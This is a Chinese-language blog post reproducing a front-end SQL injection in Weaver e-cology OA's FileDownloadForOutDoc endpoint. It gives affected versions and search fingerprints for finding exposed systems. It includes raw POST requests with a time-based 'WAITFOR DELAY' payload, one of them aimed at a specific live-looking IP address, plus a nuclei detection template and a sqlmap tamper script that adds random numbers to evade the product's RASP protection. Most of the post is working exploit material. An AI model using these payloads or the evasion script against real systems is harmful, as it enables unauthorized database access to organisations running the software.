【漏洞复现】泛微 e-cology-FileDownloadForOutDoc前台SQL注入漏洞复现
最近hw也是曝出好多好多漏洞啊,看的考研人直发痒啊啊啊。0day咱拿不到还不能玩点高频漏洞吗。所以这里收集了30几个23年的常用漏洞,来挨个复现一下哈。没事就复现一下。目前笔者也是在学c语言准备考研了,考完之后的话可能大概会继续专研技术,主要分两个方向吧,恶意软件编写和分析和web安全方面的,当然一切都还没有定数。(万一去玩web3的也说不定呢)祝笔者今年顺利考上研究生。
影响范围
Ecology 9.x 补丁版本 < 10.58.0
Ecology 8.x 补丁版本 < 10.58.0
语法特征
app.name="泛微 e-cology 9.0 OA"
app.name="泛微 e-cology OA"
app="泛微-协同商务系统"
poc
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 101.230.160.27:8885
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "AyurgkJJwkD"
If-Modified-Since: Sat, 15 Oct 2022 01:55:58 GMT
Connection: close
Content-Length: 47
fileid=512+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1
由于泛微OA启用了RASP,同一个请求执行两次会被拦截,所以需要在请求包中添加随机参数;下面是RASP的介绍
RASP是Runtime Application Self-Protection(运行时应用自我保护)的缩写,是一种用于保护应用程序免受攻击的安全技术。它是在应用程序运行时进行安全检测和保护的一种方法,可以在应用程序本身内部或与应用程序紧密集成的组件中实现。
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1
nuclei poc如下
id: ecology-oa-filedownloadforoutdoc-sqli
info:
name: EcologyOA filedownloadforoutdoc - SQL injection
author: unknown
severity: critical
description: EcologyOA filedownloadforoutdoc interface has SQL injection
tags: ecology-oa,sqli
requests:
- raw:
- |
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
matchers:
- type: dsl
dsl:
- 'duration>=5'
tamper脚本
import random
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH
def tamper(payload, **kwargs):
res = ""
ran = random.randint(1,2**20)
res = str(ran)+payload
return res
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。